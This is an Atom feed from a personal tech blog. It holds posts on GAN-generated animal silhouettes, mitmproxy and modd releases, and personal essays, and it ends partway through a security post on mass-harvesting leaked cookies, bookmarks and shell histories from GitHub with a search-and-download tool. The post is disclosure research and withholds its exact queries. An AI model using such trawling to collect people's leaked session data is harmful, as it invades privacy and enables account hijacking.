corte.si
2020-06-30T00:00:00+00:00
https://corte.si/atom.xml
Generative zoology with neural networks
2020-06-30T00:00:00+00:00
2020-06-30T00:00:00+00:00
https://corte.si/posts/code/genzoo/
<p>A couple of years ago a paper titled <em><a href="https://arxiv.org/pdf/1710.10196.pdf">Progressive Growing of GANs for Improved
Quality, Stability, and Variation</a></em>
cropped up on my reading list. It describes growing <a href="https://en.wikipedia.org/wiki/Generative_adversarial_network">generative adversarial
networks</a>
progressively, starting with low-resolution images, and then building up more
detail as training goes on. It got quite a bit of press at the time because the
authors used their idea to generate realistic, unique images of human faces.</p>
<div class="media">
<a href="./representative_image_512x256.png">
<img src="./representative_image_512x256.png" />
</a>
<div class="subtitle">
Representative images from the <a href='https://github.com/tkarras/progressive_growing_of_gans'>Progressive GANs repo</a>
</div>
</div>
<p>Looking at these images, it seems like the neural net would have to learn a vast
number of things to be able to do what these networks were doing. Some of this
seems relatively simple and factual - say, that eye colours should match. But
other aspects are fantastically complex and hard to articulate. For instance,
what nuances are needed to link the configuration of eyes, mouth and skin
creases into a coherent facial expression? Of course, I'm anthropomorphising a
statistical machine here, and we may be fooled by our intuition - it could turn
out that there are relatively few working variations, and that the solution
space is more constrained than we imagine. Maybe the most interesting thing is
not the images themselves, but rather the uncanny effect they have on us.</p>
<p>Some time later, a <a href="http://tetzoo.com/podcast">favourite podcast of mine</a>
mentioned <a href="http://phylopic.org/">PhyloPic</a>, a database of silhouette images of
animals, plants and other lifeforms. Musing along the lines above, I wondered
what would result if you trained a system like the one in the <strong>Progressive
GANs</strong> paper on a very diverse dataset of this sort. Would you just generate
many variations of a few known animal types, or would there be enough variation
to do neural-network driven <a href="https://blogs.scientificamerican.com/tetrapod-zoology/speculative-zoology-a-discussion/">speculative
zoology</a>?
However things played out, I was pretty sure I would get a few good prints for
my study wall out of it, so I set out to satisfy my curiosity with an attitude
of open-minded experimentation.</p>
<div class="media">
<a href="./animated.mp4">
<video autoplay loop muted playsinline src="./animated.mp4"></video>
</a>
<div class="subtitle">
Training from random noise to competence
</div>
</div>
<p>I adapted the <a href="https://github.com/tkarras/progressive_growing_of_gans">code from the progressive GANs
paper</a>, and trained a
model for 12000 iterations using a Google Cloud instance with 8 NVIDIA K80 GPUs
over the complete PhyloPic dataset. Total training time, including some false
starts and experiments, was 4 days. I used the final trained model to produce
50k individual images, and then spent hours poring over the results,
categorising, filtering and collating images. I also did some light editing by
flipping images to orient creatures in the same direction, because I found this
a bit more visually satisfying. This hands-on approach means that what you see
below is a sort of collaboration between me and the neural net - it did the
creative work, and I edited.</p>
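<p>As an aside, the flipping step could in principle be automated with a simple heuristic. The sketch below is my own illustration, not part of the actual workflow (which was done by hand): mirror a silhouette when most of its ink sits in the right half of the frame.</p>

```python
import numpy as np

def face_left(img):
    """Mirror a silhouette so its mass leans left.

    img: 2D array with 0.0 = ink (creature) and 1.0 = background.
    A hypothetical orientation heuristic - the post's actual
    editing was done manually.
    """
    img = np.asarray(img, dtype=float)
    dark = 1.0 - img
    mid = dark.shape[1] // 2
    # Flip horizontally when the right half carries more ink.
    if dark[:, mid:].sum() > dark[:, :mid].sum():
        return img[:, ::-1]
    return img
```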
<div class="media">
<a href="butterflies.png">
<img src="./butterflies-small.jpg" />
</a>
<div class="subtitle">
Flying insects
</div>
</div>
<p>The first surprising thing to me was how aesthetically pleasing the results
were. Much of this is certainly a reflection of the good taste of the artists
who produced the original data. However, there were also some happy accidents.
For instance, it seems that whenever the neural net enters uncertain territory -
whether it be fiddly bits that it hasn't quite mastered yet or complete flights
of vaguely biological fantasy - chromatic aberrations begin to enter the
picture. This is curious, because the input set is entirely in black and white,
so colour cannot be a learned solution to some generative problem. Any colour
must necessarily be a pure artefact of the mind of the machine. Delightfully,
one of the things that consistently triggers chromatic aberrations is the wings
of flying insects. This means that it generated hundreds and hundreds of
variations of evocatively-coloured "butterflies" like the ones above. I wonder
if this could be a useful observation - if you train using only black-and-white
images, but demand output in full colour, splotches of colour might be a useful
way to see where the model is still not able to accurately represent the
training set.</p>
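<p>That observation is easy to turn into a concrete filter. A minimal sketch (my own, not from the paper): measure how far each pixel strays from greyscale and rank generated images by the result. For a model trained purely on black-and-white data, high scores mark outputs the generator is still unsure of.</p>

```python
import numpy as np

def colourfulness(img):
    """Mean per-pixel spread between RGB channels, in [0, 1].

    img: array of shape (H, W, 3) with values in [0, 1]. A greyscale
    image scores 0; any colour artefact raises the score. This is a
    hypothetical metric, not one used in the original experiment.
    """
    img = np.asarray(img, dtype=float)
    return float((img.max(axis=-1) - img.min(axis=-1)).mean())
```

Sorting a batch of generated images by this score would surface the artefact-prone "butterflies" first.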
<p>The bulk of the output is a huge variety of entirely recognisable silhouettes -
birds, various quadrupeds, reams of little gracile theropod dinosaurs,
sauropods, fish, bugs, arachnids and humanoids.</p>
<div class="media">
<a href="birds.png">
<img src="./birds-small.jpg" />
</a>
<div class="subtitle">
Birds
</div>
</div>
<div class="media">
<a href="quadrupeds.png">
<img src="./quadrupeds-small.jpg" />
</a>
<div class="subtitle">
Quadrupeds
</div>
</div>
<div class="media">
<a href="dinos.png">
<img src="./dinos-small.jpg" />
</a>
<div class="subtitle">
Dinosaurs
</div>
</div>
<div class="media">
<a href="fish.png">
<img src="./fish-small.jpg" />
</a>
<div class="subtitle">
Fish
</div>
</div>
<div class="media">
<a href="bugs.png">
<img src="./bugs-small.jpg" />
</a>
<div class="subtitle">
Bugs
</div>
</div>
<div class="media">
<a href="hominids.png">
<img src="./hominids-small.jpg" />
</a>
<div class="subtitle">
Hominids
</div>
</div>
<h2 id="stranger-things">Stranger things</h2>
<p>Once the known critters have been weeded out, we get to stranger things. One of
the questions I had going into this was whether plausible animal body plans that
don't exist in nature would emerge - perhaps hybrids of the creatures in the
input set. Well, with careful search and a helpful touch of pareidolia, I found
hundreds of quadrupedal birds, snake-headed deer and other fantastical
monstrosities.</p>
<div class="media">
<a href="mutants.png">
<img src="./mutants-small.jpg" />
</a>
<div class="subtitle">
Monstrosities
</div>
</div>
<p>Straying even further into the unknown, the model produced weird abstract
patterns and unidentifiable entities, all with a vaguely biological, "life-ish"
feel to them.</p>
<div class="media">
<a href="fractals.png">
<img src="./fractals-small.jpg" />
</a>
<div class="subtitle">
Abstract
</div>
</div>
<div class="media">
<a href="interesting.png">
<img src="./interesting-small.jpg" />
</a>
<div class="subtitle">
Unidentifiable
</div>
</div>
<h2 id="a-random-sample">A random sample</h2>
<p>What doesn't come through in the images above is the sheer abundance of
variation in the results. I'm having a number of these image sets printed and
framed, and the effect of hundreds of small, detailed images side by side at
scale is quite striking. To give some idea of the scope of the full dataset, I'm
including one of these prints below - this one is a random sample from the
unfiltered corpus of images.</p>
<div class="media">
<a href="large.png">
<img src="./large-small.jpg" />
</a>
</div>
Some personal thoughts on our national tragedy
2019-03-19T00:00:00+00:00
2019-03-19T00:00:00+00:00
https://corte.si/posts/personal/tragedy/
<div class="media">
<a href="./dunedin_mosque.jpg">
<img src="./dunedin_mosque.jpg" alt="Outside the Al Huda Mosque" />
</a>
<div class="subtitle">
Outside the Al Huda Mosque near my home (by
<a href="https://www.flickr.com/photos/mark_mcguire/46492088665">Mark McGuire</a>)
</div>
</div>
<p>A year ago, my wife and I decided to become citizens of New Zealand. Both of our
sons were born here and are full, native Kiwis. It felt odd for our family not
to have this in common, and besides, our own connection with New Zealand had
grown strong over the happy decade we'd lived here. It was time to take the
plunge. Forms were filled in, interviews were held, and we were notified
that our citizenship ceremony would be on the 8th of February, 2018.</p>
<p>On the day, we were ushered into a hall with a podium and rows of slightly
uncomfortable stackable chairs. By the time we arrived it was already full of
our fellow soon-to-be Kiwis, along with their friends and family. Boisterous
children resisted the shushing of their parents, and there was a bit of raucous
running up and down the aisles. Nobody minded. The mood was friendly, expectant,
and happy. We took our seats next to a young Chinese couple, and behind a family
from the UK. Many were wearing splendid traditional dress from their countries
of origin - Tongan, Chinese, Thai, Indian. I myself wore a business suit,
something I only do under duress. The stiff posture and occasional
collar-stretching finger of the man in front of me showed I wasn't alone. We were all there
with common purpose - because we felt the need for a deeper commitment to our
home, and perhaps a deeper sense of acceptance in turn.</p>
<p>A dapper, splendid-mustached gentleman took his place at the podium, and the
hall became silent. He began the kind of speech you would expect: a speech of
welcome, about the rights and duties of citizenship, about the solemnity of the
moment. It was at this point, in that stuffy hall, in the middle of a somewhat
monotonous civil ceremony, that I was suddenly aware of a profound connection
with the people around me. I felt, with complete clarity, a golden thread
linking me to my wife, to the couple next to us, to the gent running the
ceremony, extending outwards to everyone in the room. I felt the presence of
generations of parents, stretching back in time, working to better the lives of
their families, all their individual journeys leading us here, to this hall at
this time. Most of all, I felt the presence of our children - all our children,
the children in the room and my children, and their children, and their
children's children, all joined, facing the unknowable future. This built to a
sort of vision: a great, thronging, thrusting, golden river of humanity,
meandering over a dark background. <em>All</em> of us together, everyone that has ever
lived and everyone that ever will, shining ties binding us together each to
each, all pushing ever forward in humanity's common project. For a moment
between breaths, I was in touch with something transcendent, cosmically larger
than me, yet something of which my own small fleck of personhood was a necessary
part.</p>
<p>Afterwards, people congregated in happy, smiling groups, shaking hands and
hugging, having their first conversations as full citizens. I slipped out the
door at the back of the hall. My wife, who knows me best, followed, holding my
hand and laughing with kind-hearted amusement at how moist-eyed and emotional I
was.</p>
<p>That moment in the hall came back to me when I first read about the atrocity in
Christchurch. I saw again the open, friendly, hopeful faces of my freshly-minted
fellow citizens. I felt again the web of love that connects us all in
fundamental unity. And I was suffused with an aching and overwhelming grief.
Grief for the victims and their families, my countrymen and countrywomen. But
grief also that anyone could have a conception of humanity so small, so narrow,
and so mean as to lead to an act like this.</p>
<p>In the coming weeks I'll be doing my part in the business of reckoning with our
national tragedy, using the tools I have - code, data, and technology. We can
do much with these, but we can't go all the way. The real work will be to look
again at the human aspect of our online communities, which, it has become
terrifyingly clear, can be an obstacle to recognising our common purpose.</p>
mitmproxy v1.0.0: Christmas Edition
2016-12-26T00:00:00+00:00
2016-12-26T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/announce_1_0/
<div class="media">
<a href="http://mitmproxy.org">
<img src="./mitmweb_1_0.png" />
</a>
</div>
<p>Six years after mitmproxy's first checkin, we've finally released version
1.0.0 of the project. Our version numbering persisted below 1.0 well into
the project's maturity, for reasons that are a tad difficult to explain. My
mental model of software development is of an eternal pilgrimage - the roadmap
of possible improvements stretches on forever, and we never quite reach a point
where we look back and feel that we've arrived. From this perspective, it makes
sense for 1.0 to always be out of reach. Rather than adopting more
<a href="http://www.tex.ac.uk/FAQ-TeXfuture.html">transcendental options</a>, I've stuck
with simply incrementing the minor version with each release. This release sees
two changes in our process. First, we're committing to a much more regular
cadence, aiming for a new release every two months or so (with minor bugfix and
patch releases in between). Second, each of these releases will see a major
version number increment - this is v1.0, we'll release v2.0 by the end of
February, and so forth. This retains something of the flavor of our previous
eccentric version numbering strategy by de-emphasizing major version increments
as flagfall events, without being as restrictive. Let the pilgrimage continue.</p>
<p>The project's momentum continues to be excellent - since the last release,
we've had 459 commits by 10 contributors, resulting in 104 closed issues and
172 closed PRs, all in just over 70 days. All this activity has resulted in a
number of very significant developments.</p>
<p>Over the last year, we've done a huge amount of work converting the project
from Python 2 to Python 3. Our previous release straddled the two versions,
retaining compatibility with Python 2.7. This release is strictly Python 3 only.
We are now well positioned to take full advantage of things like optional type
checking, the new asyncio module and the many small and large interface
improvements that Python 3 brings.</p>
<p>Our user interfaces continue to improve by leaps and bounds. The console
interface now has a much cleaner core, sports a number of new features like
flow ordering, and has seen significant speed improvements. We're also finally
releasing something we've been cooking up for quite a while - mitmweb, a web
interface to mitmproxy. It doesn't have feature parity with the console tool
yet, but we feel it's ready to step onto the stage as one of our primary
interfaces. Since mitmproxy console doesn't run on Windows (yet), mitmweb is
the best GUI option for our Windows users for now. We're also improving our
distribution mechanisms on Windows, with a new installer package kindly
provided by <a href="http://bitrock.com/">BitRock</a>. These two developments together
mean much better support for our Windows users.</p>
<p>At a protocol level, we're happy to announce that our support for Websockets is
now mature, and enabled by default. For the moment, the best way to interact
with Websockets traffic is to use our scripting mechanism - we will have
support in the GUIs very soon. On the HTTP/2 front, the news is mixed. We're
very happy with the quality of our own implementation of the protocol, but
we've discovered that some server implementations still have problems with
certain protocol edge cases. Over the last few months we found multiple bugs
affecting some very prominent websites and CDNs. We are working closely with
the affected companies to get these issues fixed - but big wheels turn slowly,
especially when it comes to business-critical infrastructure, and all the
needed repairs haven't been rolled out yet. This has left us in a bit of a
quandary - we know that fixes for these issues are imminent, and we believe
that the particular problems are idiosyncratic and shouldn't prompt a
redevelopment of our core to make us bug-for-bug compatible. Nonetheless, the
effect is that mitmproxy's HTTP/2 implementation will currently do unexpected
things when talking to large sites like Twitter and Reddit. We've decided to
disable HTTP/2 by default for this release - you can explicitly re-enable it
using the <em>--http2</em> flag.</p>
<p>Finally, if you're interested in hacking on mitmproxy, now is an excellent time
to join us. Contributing is simple - pick one of the issues that we've tagged
as <a href="https://github.com/mitmproxy/mitmproxy/issues?q=is%3Aissue+is%3Aopen+label%3Agood-first-contribution">good first
contributions</a>,
join us on <a href="https://slack.mitmproxy.org/">Slack</a> to discuss your approach, and
then send a PR.</p>
<h2 id="changelog">Changelog</h2>
<ul>
<li>All mitmproxy tools are now Python 3 only! We plan to support Python 3.5 and higher.</li>
<li>Web-Based User Interface: Mitmproxy now officially has a web-based user
interface called mitmweb. We consider it stable for all features currently
exposed in the UI, but it still misses a lot of mitmproxy’s options.</li>
<li>Windows Compatibility: With mitmweb, mitmproxy is now usable on Windows. We
are also introducing an installer (kindly sponsored by BitRock) that
simplifies setup.</li>
<li>Configuration: The config file format is now a single YAML file. In most cases,
converting to the new format should be trivial - please see the docs for
more information.</li>
<li>Console: Significant UI improvements - including sorting of flows by
size, type and url, status bar improvements, much faster indentation for
HTTP views, and more.</li>
<li>HTTP/2: Significant improvements, but temporarily disabled by default
due to widespread protocol implementation errors on some large websites</li>
<li>WebSocket: The protocol implementation is now mature, and is enabled by
default. Complete UI support is coming in the next release. Hooks for
message interception and manipulation are available.</li>
<li>A myriad of other small improvements throughout the project.</li>
</ul>
mitmproxy v0.18
2016-10-17T00:00:00+00:00
2016-10-17T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/announce_0_18/
<p>We've just released <a href="https://github.com/mitmproxy/mitmproxy/releases/tag/v0.18.1">mitmproxy
v0.18</a>! Since the
last release, the project has had 1399 commits by 40 contributors, resulting in
217 closed issues and 305 closed PRs, all of this in just over 189 days.</p>
<p>This release is notable for a number of reasons.</p>
<p>First, it contains significant contributions from our three excellent
<a href="https://developers.google.com/open-source/gsoc/">GSOC</a> students this year.
Shadab Zafar worked on Python 3 compatibility and a number of aspects of
mitmproxy's core. Clemens Brunner and Jason Hao made major improvements to
mitmweb, the upcoming web-based interface to mitmproxy. We loved working with
these guys, and hope that they will continue to hack on mitmproxy.</p>
<p>Second, the project has seen some significant internal reorganisation.
Previously, we were split over three separate repositories (mitmproxy, netlib
and pathod). Over time, the practical headaches of keeping everything
synchronised started taking a toll, and we decided to amalgamate it all in a
single repo. The most immediate external effect is that installing mitmproxy
(through, say, "pip install mitmproxy") now gets you all of the associated
tools and libraries, including pathod and pathoc.</p>
<p>Finally, 0.18 will be the last major version of mitmproxy compatible with
Python 2. The next release will target Python 3.5 only, with all of the 2/3
compatibility cruft stripped out. This is not a decision we took lightly - we
have a significant community of developers that have tools based on mitmproxy,
and we realise this might be painful for some of them. We feel that being able
to use the full features of Python 3.5 will make the transition worth it. If
you have a library or tool based on mitmproxy, you should start planning for a
conversion now. We'd be very happy to help you navigate the transition, so feel
free to drop by the <a href="https://slack.mitmproxy.org/">Slack channel</a> to chat to
the dev team.</p>
<h2 id="changelog">Changelog</h2>
<ul>
<li>Python 3 Compatibility for mitmproxy and pathod (Shadab Zafar, GSoC 2016)</li>
<li>Major improvements to mitmweb (Clemens Brunner & Jason Hao, GSoC 2016)</li>
<li>Internal Core Refactor: Separation of most features into isolated Addons</li>
<li>Initial Support for WebSockets</li>
<li>Improved HTTP/2 Support</li>
<li>Reverse Proxy Mode now automatically adjusts host headers and TLS Server Name Indication</li>
<li>Improved HAR export</li>
<li>Improved export functionality for curl, python code, raw http etc.</li>
<li>Flow URLs are now truncated in the console for better visibility</li>
<li>New filters for TCP, HTTP and marked flows.</li>
<li>Mitmproxy now handles comma-separated Cookie headers</li>
<li>Merge mitmproxy and pathod documentation</li>
<li>Mitmdump now sanitizes its console output to not include control characters</li>
<li>Improved message body handling for HTTP messages:
<ul>
<li>.raw_content provides the message body as seen on the wire</li>
<li>.content provides the decompressed body (e.g. un-gzipped)</li>
<li>.text provides the decompressed and decoded body</li>
</ul>
</li>
<li>New HTTP Message getters/setters for cookies and form contents.</li>
<li>Add ability to view only marked flows in mitmproxy</li>
<li>Improved Script Reloader (Always use polling, watch for whole directory)</li>
<li>Use tox for testing</li>
<li>Unicode support for tnetstrings</li>
<li>Add dumpfile converters for mitmproxy versions 0.11 and 0.12</li>
<li>Numerous bugfixes</li>
</ul>
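<p>The relationship between the three body getters above can be illustrated with a standard-library analogy. This mirrors the documented behaviour; it is not mitmproxy's internal code:</p>

```python
import gzip

# .raw_content: the body exactly as seen on the wire (here, gzipped).
raw_content = gzip.compress("size: größe".encode("utf-8"))

# .content: the body with the content encoding removed (un-gzipped).
content = gzip.decompress(raw_content)

# .text: the decompressed body decoded to a string via the charset.
text = content.decode("utf-8")

assert text == "size: größe"
```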
<h2 id="contributors-for-this-release">Contributors for this release</h2>
<ul>
<li>Aldo Cortesi</li>
<li>Angelo Agatino Nicolosi</li>
<li>BSalita</li>
<li>Brett Randall</li>
<li>Christian Frichot</li>
<li>Clemens Brunner</li>
<li>Cory Benfield</li>
<li>Doug Freed</li>
<li>Drake Caraker</li>
<li>Felix Yan</li>
<li>Israel Blancas</li>
<li>Jason</li>
<li>Jason Pepas</li>
<li>Jonathan Jones</li>
<li>Kostya Esmukov</li>
<li>Linmiao Xu</li>
<li>Manish Kumar</li>
<li>Maximilian Hils</li>
<li>Ryan Laughlin</li>
<li>Sachin Kelkar</li>
<li>Sanchit Sokhey</li>
<li>Schamper</li>
<li>Shadab Zafar</li>
<li>Steven Noble</li>
<li>Steven Van Acker</li>
<li>Tai Dickerson</li>
<li>Thomas Kriechbaumer</li>
<li>Tyler St. Onge</li>
<li>Vincent Haupert</li>
<li>Wes Turner</li>
<li>Yoginski</li>
<li>Zohar Lorberbaum</li>
<li>arjun</li>
<li>chhsiao</li>
<li>jpkrause</li>
<li>phackt</li>
<li>redfast</li>
<li>smill</li>
<li>strohu</li>
<li>vulnminer</li>
</ul>
Hobbes
2016-03-22T00:00:00+00:00
2016-03-22T00:00:00+00:00
https://corte.si/posts/personal/hobbes/
<div class="media">
<a href="./hobbes.jpg">
<img src="./hobbes.jpg" />
</a>
</div>
<p>Eight years ago my wife and I walked into the <a href="https://www.catprotection.org.au/">Cat Protection
Society</a> near our house in Sydney on a whim -
just to look, we assured each other, and <em>most definitely</em> not to get another
cat. Thirty minutes later we emerged with a box containing a tiny ball of
scraggly orange fluff, a wee kitten we immediately named Hobbes. Circumstances
had taken Hobbes away from his mother far too early, and since I was able to work
from home at the time the job of playing surrogate largely fell to me. I fed
him, let him perch on my shoulder like a fluffy little malodorous parrot while
I worked, and cleaned him with a cotton bud after his inept attempts to use the
litter tray. He grew from a tiny scrap to a mischievous and energetic kitten,
and then to a somewhat slothful but very handsome boy. Perhaps because he came
to us so young, Hobbes never got on with other cats. He preferred the company
of humans, and considered himself to be as much of a person as anyone else. The
photo above is him in his natural habitat: draped bonelessly over my lap like a
purring orange throw-rug, just being part of whatever conversation his humans
are having.</p>
<p>About a year ago, Hobbes started losing weight. Truth be told shedding a few
pounds would probably have done him good, but this was unexplained by any
change in his diet. After a series of X-rays and a biopsy we got bad news: he
had lymphoma. With chemotherapy he would have a year or so of high-quality life
left, but likely not much more. Apart from giving him his daily pills, there
was not much we could do. We treated him to his favorite food as often as
seemed sensible, and watched carefully for the moment when the scales tipped
and discomfort outweighed the joy in his life.</p>
<p>This morning Zoe and I took Hobbes to the vet one last time. He always hated
being in the cat carrier, and would pace, tense and wide-eyed, ready to spring
out like a jack-in-the-box when we opened the door. Today, he just seemed tired
and sore, huddled motionlessly in an uncomfortable-looking crouch. We held him
together as the vet gave him two injections - one to send him gently to sleep,
and shortly after, another to stop his heart. Afterwards we brought him home
and buried him under a cherry tree in our garden. Perhaps when spring comes, it
will flower orange.</p>
<p>Goodbye, Hobbesy. Your family will miss you. You were a good, good boy.</p>
modd: a flexible tool for responding to filesystem change
2016-02-11T00:00:00+00:00
2016-02-11T00:00:00+00:00
https://corte.si/posts/modd/announce/
<p>I've just released <a href="https://github.com/cortesi/modd">modd</a>, a new<sup class="footnote-reference"><a href="#1">1</a></sup> project of
mine. Like its sister project <a href="https://github.com/cortesi/devd">devd</a>, it's
distributed as a single, self-contained binary for all major platforms - <a href="https://github.com/cortesi/modd/releases">get it
while it's fresh</a>.</p>
<p>Modd is a simple tool that's hard to explain pithily. It triggers commands and
manages daemons in response to filesystem changes - but that is a
technically-correct mouthful that doesn't really convey how it is used. Part of
the problem is that it is extremely flexible. In my projects it runs linters,
does live code compiles, manages infrastructure daemons like databases, runs
test instances of projects and is even rendering and live-reloading this blog
post as I type. Modd replaces parts of tools like <a href="http://gulpjs.com/">Gulp</a>,
<a href="http://gruntjs.com/">Grunt</a>, <a href="https://ddollar.github.io/foreman/">Foreman</a> and
<em>make</em>, but it can also augment them. For instance, one of my projects is
entirely driven by a Makefile, with tasks invoked by modd on change.</p>
<p>At modd's core is a file change detection library that tries to get things
right for most developer work patterns. It handles temporary files, VCS
directories and many <a href="https://twitter.com/cortesi/status/661316050542329856">pathological behaviors shown by common
editors</a> correctly (or
at least tries really hard to). The change detection algorithm waits for a lull
in activity, so that jobs aren't triggered in the middle of progressive
processes like renders and compiles that may touch many files. The result is
change detection that is less surprising and more consistent than similar
projects out there. The output of the change detection algorithm is then hooked
up to a very flexible way to specify commands and manage daemons, letting you
specify shell scripts that trigger on file match patterns in a single config
file. Finally, there are a few mod-cons. A custom <a href="https://github.com/cortesi/termlog">terminal logging
module</a> lets modd sensibly interleave the
output of possibly concurrent daemons and commands, with headings showing which
command was responsible for what. Modd also has support for desktop
notifications (<a href="http://growl.info/">Growl</a> on OSX,
<a href="https://developer.gnome.org/libnotify/">libnotify</a> on Linux), letting you see
things like linter output and compile errors immediately.</p>
<p>Below, I'm going to show one quick example of how I use modd to do a live
build/compile cycle for <a href="https://github.com/cortesi/devd">devd</a>, a pretty
standard Go project. In a future post, I'll show how I've replaced Gulp
entirely for a Javascript-heavy front-end project.</p>
<p>Please see the <a href="https://github.com/cortesi/modd">modd documentation</a> for a
complete explanation of the syntax and for more examples.</p>
<h2 id="test-compile-cycle-for-go">Test-compile cycle for Go</h2>
<p>On startup, modd looks for a file called <em>modd.conf</em> in the current directory.
This file has a simple but powerful syntax - one or more blocks of commands,
each of which can be triggered on changes to files matching a set of file
patterns. Commands have two flavors: <strong>prep</strong> commands that run and terminate
(e.g. compiling, running test suites or running linters), and <strong>daemon</strong>
commands that run and keep running (e.g. databases or webservers). Daemons are
restarted when their block is triggered, after all prep commands have run
successfully. Commands are embedded shell scripts, so shell features like
redirection work, and compound, multi-step commands are common.</p>
<p>Here is the simple <strong>modd.conf</strong> I use to drive the test cycle for
<a href="https://github.com/cortesi/devd">devd</a>:</p>
<pre style="background-color:#2b303b;">
<code>**/*.go {
prep: go test @dirmods
}
**/*.go !**/*_test.go {
prep: go install ./cmd/devd
daemon +sigterm: devd -ml ./tmp
}
</code></pre>
<p>When the <em>modd</em> command is run, the commands execute for the first time, and
modd is then ready to respond to changes. The initial output looks like this:</p>
<div class="media">
<a href="modd-devd.png">
<img src="modd-devd.png" />
</a>
</div>
<p>The config file does three things:</p>
<ul>
<li>When any .go file changes, it runs "go test" on the affected module.</li>
<li>When a non-test file changes, it compiles and installs devd.</li>
<li>It keeps a test instance of the devd daemon running, and restarts it with a
SIGTERM when needed.</li>
</ul>
<p>The one subtlety here is the <strong>@dirmods</strong> tag, which is replaced with a
shell-escaped list of all directories that contain modified files. There's a
similar tag - <strong>@mods</strong> - that is replaced with all matching modified files.
When first run, both of these tags are replaced by all possible matches - that
is, all directories containing matching files, and all matching files
respectively. This means that the test suite for all the Go modules in the
project is run on startup, and only for modified modules after that.</p>
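<p>In Python pseudocode, the expansion of <strong>@dirmods</strong> might look something like this - a sketch of the documented behaviour, not modd's actual Go implementation:</p>

```python
import shlex
from pathlib import PurePosixPath

def expand_dirmods(modified):
    # Unique directories containing modified files, shell-escaped
    # and space-joined, ready for substitution into a prep command.
    dirs = sorted({str(PurePosixPath(p).parent) for p in modified})
    return " ".join(shlex.quote(d) for d in dirs)

# e.g. for changes under cmd/devd/ and server/:
# expand_dirmods(["cmd/devd/main.go", "server/http_test.go"])
# -> "cmd/devd server"
```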
<div class="footnote-definition" id="1"><sup class="footnote-definition-label">1</sup>
<p>In fact, this is <a href="https://github.com/cortesi/modd/blob/master/CHANGELOG.md">release
v0.2</a>, which slipped
in before I had time to announce v0.1 on my blog.</p>
</div>
mitmproxy v0.15
2015-12-04T00:00:00+00:00
2015-12-04T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/announce_0_15/
<div class="media">
<a href="http://mitmproxy.org">
<img src="../announce_0_12_1/mitmproxy_0_12_1.gif" />
</a>
</div>
<p>We've just released <a href="http://www.mitmproxy.org">mitmproxy 0.15</a>. This is
primarily a bugfix release, but with a few really juicy long-demanded features
thrown in:</p>
<ul>
<li>Support for loading and converting older dumpfile formats (0.13 and up)</li>
<li>Content views for inline script (@chrisczub)</li>
<li>Better handling of empty header values (Benjamin Lee/@bltb)</li>
<li>Fix a gnarly memory leak in mitmdump</li>
<li>A number of bugfixes and small improvements</li>
</ul>
<p>Behind the scenes, there has been a bunch of other exciting developments. The
effort to port mitmproxy and its underlying libraries to Python3 continues
apace. Our automated build and testing infrastructure has improved hugely - we
now have <a href="http://snapshots.mitmproxy.org">up-to-date binary snapshots built for each
commit</a>.</p>
<p>Thanks to all the contributors who helped get this release out the door, and,
as usual, special thanks to my invaluable co-maintainer
<a href="https://maximilianhils.com/">Max</a>, who's been steering things while I've been
busy elsewhere.</p>
Trawling Github for cookies, bookmarks and browsing history
2015-11-26T00:00:00+00:00
2015-11-26T00:00:00+00:00
https://corte.si/posts/hacks/github-browserstate/
<p>It's a universal rule that search over a sufficiently large body of user data
poses security challenges. This follows naturally from the fact that humans -
even smart, informed, careful humans - occasionally slip up. Given enough data,
and the ability to pick out slip-ups with search, there will always be rich
pickings for a malefactor. I wrote a short series of posts a while ago about
interesting things I found on Github - <a href="https://corte.si/posts/hacks/github-shhistory/">commands from shell history
files</a>, <a href="https://corte.si/posts/hacks/github-pipechains/">common pipe
chains</a>, and words from <a href="https://corte.si/posts/hacks/github-spellingdicts/">custom
spell-check dictionaries</a>. While
shell history files could definitely contain very sensitive information, in
practice there were only a handful of really damaging issues in the dataset.
Trawling around people's dotfile directories, I found that something much more
damaging often made it into repos: browser state. It's easy to see how this
could happen - it takes just one injudicious add of a hidden directory to
expose cookies, browser history, bookmarks and more. I decided to return to
this issue later, and it slipped off my radar until recently.</p>
<p>When I wrote the first series of posts, I also released a <a href="https://github.com/cortesi/ghrabber">tiny tool called
ghrabber</a> (just a hack, really) that lets
you grab files from Github en-masse using a Github code search query. The first
thing I noticed when I picked it up again is that it no longer worked as
expected. I used to be able to retrieve all files matching a path, like so:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;"> </span><span style="color:#bf616a;">ghrabber.py </span><span style="color:#c0c5ce;">"</span><span style="color:#a3be8c;">path:.bash_history</span><span style="color:#c0c5ce;">"
</span></code></pre>
<p>Today, this returns an error - Github now requires you to specify both a search
term <strong>and</strong> a path<sup class="footnote-reference"><a href="#1">1</a></sup>. There are all sorts of possible explanations for this
change, but I like to think that it's meant to prevent (or at least impede)
exactly the kind of trawling I've been amusing myself with.</p>
<p>Let's say we want to search for Firefox browser profile cookies. These are
stored in a SQLite file called "cookies.sqlite". Github doesn't index binary files
for search, so we can't search for characteristic content in the file. Path
specification is broken, so we can't search for the filename. Stumped, right?
Not so fast - the cookie files live in a directory with a large number of
associated non-binary files. If we could come up with a signature for one of
these accompanying files, then we could download a path relative to the match
to retrieve the cookie storage file itself. I quickly <a href="https://github.com/cortesi/ghrabber/commit/9b7909ccd594168ab8eb3d44834055b510e90273">added a flag to do
exactly this to
ghrabber</a>,
and cooked up appropriate query strings to detect Firefox and Chrome browser
profiles. I'll elide those here, for obvious reasons.</p>
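<p>The relative-path trick itself boils down to rewriting the final component of a matched file's URL. A minimal sketch (the file names here are illustrative, and the real query strings are deliberately omitted above):</p>

```python
import posixpath

def sibling_url(match_url, sibling):
    """Given the raw URL of a file matched by code search, build the URL
    of a sibling file in the same directory - e.g. a binary cookie store
    sitting next to a matched plain-text profile file."""
    return posixpath.join(posixpath.dirname(match_url), sibling)
```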
<h2 id="a-look-at-the-data">A look at the data</h2>
<p>The result was <strong>708</strong> distinct browser profiles that included <strong>33 364</strong>
bookmarks, and <strong>88 013</strong> cookies. Many of these profiles are actually
intentional checkins - test harnesses, blank profiles and so forth. However,
some totally unscientific manual sampling indicates that just less than half of
these are probably genuine accidental checkins, containing private information.</p>
<p>Let's take a light, high-level look at the data. The figure below shows the
percentage of profiles with cookies from each TLD:</p>
<figure>
<img class="img-responsive center-block" src="./cookies.png"/>
<figcaption class="text-center">Percentage of profiles with cookies from domain</figcaption>
</figure>
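<p>The figure above comes down to a simple computation: for each domain, count the fraction of profiles whose cookie store mentions it at least once. A rough sketch, assuming Firefox's standard <code>moz_cookies</code> schema:</p>

```python
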